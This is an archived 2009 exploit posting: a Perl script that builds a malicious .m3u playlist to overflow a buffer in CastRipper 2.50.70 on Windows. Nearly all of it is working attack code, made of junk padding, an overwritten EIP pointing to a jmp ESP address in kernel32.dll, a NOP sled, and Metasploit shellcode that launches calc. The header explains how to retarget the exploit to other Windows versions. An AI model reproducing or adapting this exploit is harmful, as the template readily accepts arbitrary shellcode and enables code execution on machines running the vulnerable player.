castripperm3u-overflow.txt
Posted on 13 May 2009
#!/usr/bin/perl #[+]--------------------------------------------------------------------------------------[+]# # CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit # By [0]x80->[H]4x²0r # hashteck[at]Gmail[dot]com # From Morocco #[+]--------------------------------------------------------------------------------------[+]# # program : CastRipper # version : 2.50.70 # download : http://www.mini-stream.net/castripper/ #[+]--------------------------------------------------------------------------------------[+]# # Tested Under Win$hit Vista Pro # After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)# # NOTE : if you want to use it under an other version of Win32 use jmpfind.exe #( avalaible on the net) to find a matching address with which you'll overwrite your EIP . #[+]--------------------------------------------------------------------------------------[+]# ##################################### Proud to be Moroccan ################################### $junk="x41" x 17379; $eip="xF8x03xB1x76"; # 0x76B103F8 jmp ESP - Kernel32.dll $nops="x46" x 10; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com $shell = "x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x88". "xd3x37xccx83xebxfcxe2xf4x74x3bx73xccx88xd3xbcx89". "xb4x58x4bxc9xf0xd2xd8x47xc7xcbxbcx93xa8xd2xdcx85". "x03xe7xbcxcdx66xe2xf7x55x24x57xf7xb8x8fx12xfdxc1". "x89x11xdcx38xb3x87x13xc8xfdx36xbcx93xacxd2xdcxaa". "x03xdfx7cx47xd7xcfx36x27x03xcfxbcxcdx63x5ax6bxe8". "x8cx10x06x0cxecx58x77xfcx0dx13x4fxc0x03x93x3bx47". "xf8xcfx9ax47xe0xdbxdcxc5x03x53x87xccx88xd3xbcxa4". "xb4x8cx06x3axe8x85xbex34x0bx13x4cx9cxe0x23xbdxc8". "xd7xbbxafx32x02xddx60x33x6fxb0x56xa0xebxd3x37xcc"; # | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------| open(m3u,">>Exploit.m3u"); print m3u $junk.$eip.$nops.$shell; print "[+] Done !! [+]"; close(m3u);
